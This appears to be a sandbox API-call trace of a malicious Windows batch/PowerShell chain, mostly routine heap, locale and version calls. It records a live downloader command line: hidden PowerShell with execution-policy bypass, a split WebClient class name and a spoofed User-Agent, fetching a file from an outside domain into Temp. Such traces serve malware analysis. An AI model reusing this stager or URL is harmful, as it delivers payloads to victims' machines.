	[0096.406] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0096.406] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0096.406] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0096.406] GetProcessHeap () returned 0x340000
	[0096.406] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x48) returned 0x358d80
	[0096.406] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f6e0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0096.406] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x24f6e0, lpFilePart=0x24f6c0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x24f6c0*="Documents") returned 0x1b
	[0096.406] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0096.406] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f3f0 | out: lpFindFileData=0x24f3f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x35c5d0
	[0096.406] FindClose (in: hFindFile=0x35c5d0 | out: hFindFile=0x35c5d0) returned 1
	[0096.406] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x24f3f0 | out: lpFindFileData=0x24f3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x35c5d0
	[0096.406] FindClose (in: hFindFile=0x35c5d0 | out: hFindFile=0x35c5d0) returned 1
	[0096.406] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x24f3f0 | out: lpFindFileData=0x24f3f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x35c5d0
	[0096.407] FindClose (in: hFindFile=0x35c5d0 | out: hFindFile=0x35c5d0) returned 1
	[0096.407] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0096.407] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0096.407] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0096.407] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0096.407] GetProcessHeap () returned 0x340000
	[0096.407] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35bad0 | out: hHeap=0x340000) returned 1
	[0096.407] GetEnvironmentStringsW () returned 0x35afd0*
	[0096.407] GetProcessHeap () returned 0x340000
	[0096.407] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb2c) returned 0x35bb10
	[0096.407] FreeEnvironmentStringsW (penv=0x35afd0) returned 1
	[0096.407] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0096.407] GetProcessHeap () returned 0x340000
	[0096.407] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x358d80 | out: hHeap=0x340000) returned 1
	[0096.407] GetProcessHeap () returned 0x340000
	[0096.407] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4016) returned 0x35c650
	[0096.408] GetProcessHeap () returned 0x340000
	[0096.408] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x260) returned 0x359c80
	[0096.408] GetProcessHeap () returned 0x340000
	[0096.408] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35c650 | out: hHeap=0x340000) returned 1
	[0096.408] GetConsoleOutputCP () returned 0x1b5
	[0096.408] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0096.408] GetUserDefaultLCID () returned 0x409
	[0096.408] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0096.408] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f7f0, cchData=128 | out: lpLCData="0") returned 2
	[0096.408] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f7f0, cchData=128 | out: lpLCData="0") returned 2
	[0096.408] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f7f0, cchData=128 | out: lpLCData="1") returned 2
	[0096.408] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0096.408] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0096.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0096.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0096.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0096.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0096.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0096.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0096.409] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0096.409] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0096.409] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0096.410] GetProcessHeap () returned 0x340000
	[0096.410] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x20c) returned 0x359f60
	[0096.410] GetConsoleTitleW (in: lpConsoleTitle=0x359f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0096.410] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0096.410] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0096.410] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0096.410] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0096.410] GetProcessHeap () returned 0x340000
	[0096.410] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4012) returned 0x35c650
	[0096.410] GetProcessHeap () returned 0x340000
	[0096.410] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4010) returned 0x360670
	[0096.411] GetProcessHeap () returned 0x340000
	[0096.411] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x1a) returned 0x3549a0
	[0096.411] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0096.411] GetProcessHeap () returned 0x340000
	[0096.411] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x3549a0 | out: hHeap=0x340000) returned 1
	[0096.411] GetProcessHeap () returned 0x340000
	[0096.411] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x360670 | out: hHeap=0x340000) returned 1
	[0096.411] GetProcessHeap () returned 0x340000
	[0096.411] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4010) returned 0x360670
	[0096.411] GetProcessHeap () returned 0x340000
	[0096.411] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x1a) returned 0x3549a0
	[0096.411] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0096.411] GetProcessHeap () returned 0x340000
	[0096.411] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x3549a0 | out: hHeap=0x340000) returned 1
	[0096.411] GetProcessHeap () returned 0x340000
	[0096.411] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x360670 | out: hHeap=0x340000) returned 1
	[0096.411] GetProcessHeap () returned 0x340000
	[0096.411] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35c650 | out: hHeap=0x340000) returned 1
	[0096.412] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0096.412] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0096.412] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0096.412] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0096.412] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0096.412] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0096.412] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0096.412] GetProcessHeap () returned 0x340000
	[0096.412] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0) returned 0x35a180
	[0096.412] GetProcessHeap () returned 0x340000
	[0096.412] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x30) returned 0x3569a0
	[0096.412] GetProcessHeap () returned 0x340000
	[0096.412] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x14) returned 0x358d80
	[0096.413] GetProcessHeap () returned 0x340000
	[0096.413] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0) returned 0x35a240
	[0096.553] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0096.553] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0096.553] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0096.553] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0096.553] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0096.553] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0096.553] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0096.553] GetProcessHeap () returned 0x340000
	[0096.553] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0) returned 0x35a300
	[0096.553] GetProcessHeap () returned 0x340000
	[0096.553] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x2e) returned 0x3569e0
	[0096.558] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0096.558] GetProcessHeap () returned 0x340000
	[0096.558] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x170) returned 0x341a20
	[0096.558] GetProcessHeap () returned 0x340000
	[0096.558] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x2d0) returned 0x35b050
	[0096.569] _get_osfhandle (_FileHandle=2) returned 0xb
	[0096.569] GetFileType (hFile=0xb) returned 0x2
	[0096.569] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0096.569] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f098 | out: lpMode=0x24f098) returned 1
	[0096.569] _get_osfhandle (_FileHandle=2) returned 0xb
	[0096.569] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x24f0d0 | out: lpConsoleScreenBufferInfo=0x24f0d0) returned 1
	[0096.569] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0096.571] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0096.571] GetProcessHeap () returned 0x340000
	[0096.571] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x170) returned 0x341c30
	[0096.571] GetProcessHeap () returned 0x340000
	[0096.571] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x2d0) returned 0x35b6b0
	[0096.573] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x24eec0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24ee70 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x24ee70*(hProcess=0x54, hThread=0x50, dwProcessId=0x310, dwThreadId=0x6bc)) returned 1
	[0096.578] CloseHandle (hObject=0x50) returned 1
	[0096.578] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0096.578] GetProcessHeap () returned 0x340000
	[0096.578] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35bb10 | out: hHeap=0x340000) returned 1
	[0096.578] GetEnvironmentStringsW () returned 0x35b8d0*
	[0096.578] GetProcessHeap () returned 0x340000
	[0096.578] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb2c) returned 0x35c820
	[0096.578] FreeEnvironmentStringsW (penv=0x35b8d0) returned 1
	[0096.578] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "30"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x50acc000"
	os_pid = "0x310"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "29"
	os_parent_pid = "0x828"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 240
	os_tid = 0x6bc

	[0099.718] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0100.459] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0100.460] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0100.460] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0100.460] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0101.821] GetVersionExW (in: lpVersionInformation=0x1adf60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adf60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0101.824] GetVersionExW (in: lpVersionInformation=0x1adf60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adf60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0101.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1adb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1adc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.836] GetVersionExW (in: lpVersionInformation=0x1adcd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adcd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0101.836] SetErrorMode (uMode=0x1) returned 0x1
	[0101.837] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ade30 | out: lpFileInformation=0x1ade30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0101.838] SetErrorMode (uMode=0x1) returned 0x1
	[0101.842] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ae0a0 | out: lpdwHandle=0x1ae0a0) returned 0x94c
	[0101.844] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b87370 | out: lpData=0x2b87370) returned 1
	[0101.846] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ae018, puLen=0x1ae010 | out: lplpBuffer=0x1ae018*=0x2b8740c, puLen=0x1ae010) returned 1
	[0101.849] lstrlenW (lpString="䅁") returned 1
	[0102.133] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x2b874e8, puLen=0x1adf80) returned 1
	[0102.134] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0102.136] CoTaskMemAlloc (cb=0x2e) returned 0x2a15c0
	[0102.136] lstrcpyW (in: lpString1=0x2a15c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0102.137] CoTaskMemFree (pv=0x2a15c0) 
	[0102.137] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x2b8753c, puLen=0x1adf80) returned 1
	[0102.137] lstrlenW (lpString="System.Management.Automation") returned 28
	[0102.137] CoTaskMemAlloc (cb=0x3c) returned 0x2538c0
	[0102.137] lstrcpyW (in: lpString1=0x2538c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0102.137] CoTaskMemFree (pv=0x2538c0) 
	[0102.137] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x2b87598, puLen=0x1adf80) returned 1
	[0102.137] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0102.137] CoTaskMemAlloc (cb=0x20) returned 0x2a6610
	[0102.137] lstrcpyW (in: lpString1=0x2a6610, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0102.137] CoTaskMemFree (pv=0x2a6610) 
	[0102.137] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x2b875d8, puLen=0x1adf80) returned 1
	[0102.137] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0102.137] CoTaskMemAlloc (cb=0x44) returned 0x2538c0
	[0102.137] lstrcpyW (in: lpString1=0x2538c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0102.137] CoTaskMemFree (pv=0x2538c0) 
	[0102.137] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x2b87640, puLen=0x1adf80) returned 1
	[0102.137] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0102.137] CoTaskMemAlloc (cb=0x76) returned 0x244360
	[0102.137] lstrcpyW (in: lpString1=0x244360, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0102.137] CoTaskMemFree (pv=0x244360) 
	[0102.137] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x2b876dc, puLen=0x1adf80) returned 1
	[0102.138] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0102.138] CoTaskMemAlloc (cb=0x44) returned 0x2538c0
	[0102.138] lstrcpyW (in: lpString1=0x2538c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0102.138] CoTaskMemFree (pv=0x2538c0) 
	[0102.138] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x2b87740, puLen=0x1adf80) returned 1
	[0102.138] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0102.138] CoTaskMemAlloc (cb=0x58) returned 0x20a330
	[0102.138] lstrcpyW (in: lpString1=0x20a330, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0102.138] CoTaskMemFree (pv=0x20a330) 
	[0102.138] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x2b877bc, puLen=0x1adf80) returned 1
	[0102.138] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0102.138] CoTaskMemAlloc (cb=0x20) returned 0x2a6610
	[0102.138] lstrcpyW (in: lpString1=0x2a6610, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0102.138] CoTaskMemFree (pv=0x2a6610) 
	[0102.138] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x2b87464, puLen=0x1adf80) returned 1
	[0102.138] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0102.138] CoTaskMemAlloc (cb=0x66) returned 0x2ad8e0
	[0102.138] lstrcpyW (in: lpString1=0x2ad8e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0102.138] CoTaskMemFree (pv=0x2ad8e0) 
	[0102.138] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x0, puLen=0x1adf80) returned 0
	[0102.138] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x0, puLen=0x1adf80) returned 0
	[0102.138] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1adf88, puLen=0x1adf80 | out: lplpBuffer=0x1adf88*=0x0, puLen=0x1adf80) returned 0
	[0102.138] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adf58, puLen=0x1adf50 | out: lplpBuffer=0x1adf58*=0x2b8740c, puLen=0x1adf50) returned 1
	[0102.139] CoTaskMemAlloc (cb=0x204) returned 0x256ff0
